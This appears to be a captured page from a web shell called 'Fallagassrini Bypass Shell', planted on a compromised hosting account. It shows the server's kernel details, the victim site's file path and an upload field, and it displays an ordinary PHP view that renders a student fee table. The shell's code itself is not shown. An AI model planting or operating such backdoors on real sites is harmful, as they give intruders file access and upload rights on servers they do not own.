? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sec_old/application/views/student/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sec_old/application/views/student/student_details.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
?>

<tr>
    <td>
        <input style="width:15px;" type="checkbox" id="select_student<?=$index?>" name="select_student<?=$index?>" checked  />   
        <input name="student_batch_id<?=$index?>" id="student_batch_id<?=$index?>" value="<?=$student_batch_id?>" type="hidden"/>
    </td>
    <td>
        <?=$viewinfo->first_name.' '.$viewinfo->last_name?>
        <input type="hidden" id="student_id<?=$index?>" name="student_id<?=$index?>" value="<?= $viewinfo->student_id ?>"/>
    </td>
    <td>
        <?=$viewinfo->reg_no;?>
    </td>
     <td>
        <?=$viewinfo->gender;?>
    </td>
     <td>
        <?=$viewinfo->nationality;?>
    </td>
    <td>
        <input type="text" style="width: 115px;float: right;" class="auto text_r" name="register_fee<?=$index?>" id="register_fee<?=$index?>" value="<?=$reg_fee?>" />
    </td>
    <td>
        <input type="text" style="width: 115px;float: right;" class="required auto text_r" name="course_fee<?=$index?>" id="course_fee<?=$index?>" value="<?=$fee?>" />
    </td>
    <td>
        <input type="text" style="width: 115px;float: right;" class="auto text_r" name="books_fee<?=$index?>" id="books_fee<?=$index?>" value="<?=$books_fee?>" />
    </td>
    <td>
        <div style="height:10px"></div>
        <select name="session<?=$index?>" id="session<?=$index?>" onchange="getSessionAmount(this.value,'session_amount<?=$index?>')" class="chzn-done">
            <option value="">Select</option>
            <?php
            if(isset($sections)){
                foreach ($sections as $value) {
                    echo '<option value="'.$value['no_sessions_id'].'~'.$value['monthly_fee'].'">'.$value['no_sessions'].'</option>';
                }
            }
            ?>
        </select>
    </td>
    <td>
        <input class="required auto " type="text" name="session_amount<?=$index?>" id="session_amount<?=$index?>"/>
    </td>
</tr>


<script type="text/javascript">
    $(document).ready(function()
    {
       $("input.auto").css('text-align', 'right');
        $('input.auto').autoNumeric();
    });

</script>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net